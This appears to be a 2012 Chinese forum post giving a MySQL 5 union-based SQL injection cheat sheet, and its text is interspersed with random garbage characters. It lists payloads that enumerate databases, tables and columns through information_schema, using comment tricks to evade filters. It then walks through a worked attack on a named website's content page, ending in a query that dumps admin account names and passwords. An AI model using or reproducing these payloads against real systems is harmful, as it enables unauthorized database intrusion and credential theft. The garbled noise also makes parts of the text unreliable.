查库- d8 \+ \( u* h3 P/ C$ P
+ N6 G4 I5 B* h& L6 _' L; h( Uid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
; Y; Z, u9 M, b" l4 V' o+ Z
2 O4 V; m' y" l查表3 X3 @$ I3 L2 i2 t
6 D+ S7 ? ]. _& F* u8 ~) T; lid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
8 T7 U7 @, N" b1 I. _' T* m5 m7 P. c
查段
; _; B6 i/ w$ ^4 L6 R( }/ b
$ g: o4 I9 x4 w- bid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
. Q' e7 w& {! N' b
, B' z+ n4 l, M8 p- M: _" z4 I+ Q% h5 b% \& v
mysql5高级注入方法暴表; y' u* |/ j6 f
/ {/ F, ~" v( q& N- B9 L; m
例子如下:* }' E5 e4 Z M8 X4 ]2 c7 F0 A
, g# O7 S! N1 T! p( w2 l) w" M
1.爆表; F& v) M) K/ J* Z- l! a& Y
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
' ?9 h$ o! m) K* R% H; A) F) D这样爆到第4个时出现了admin_user表。6 T* w6 j2 J% A; O9 O
0 x) G; r. Z4 @7 i
2.暴字段
) {) r/ Q2 |$ @4 ~3 Dhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*0 x6 D% R/ h$ A. h
" W3 [2 ` ]- D7 {) \
3 o- s' B/ T/ |0 t' z6 l3.爆密码
+ E8 ^+ A# W6 |1 e6 f8 xhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
% w2 ^ y$ N- |$ g% f4 O5 u# U8 o) x0 k8 R" W6 A) g% O. p% D, d
* \$ T! }! C. c0 m2 J) W; [1 ]
|
发表于 2012-9-13 16:29:37
收藏
支持
反对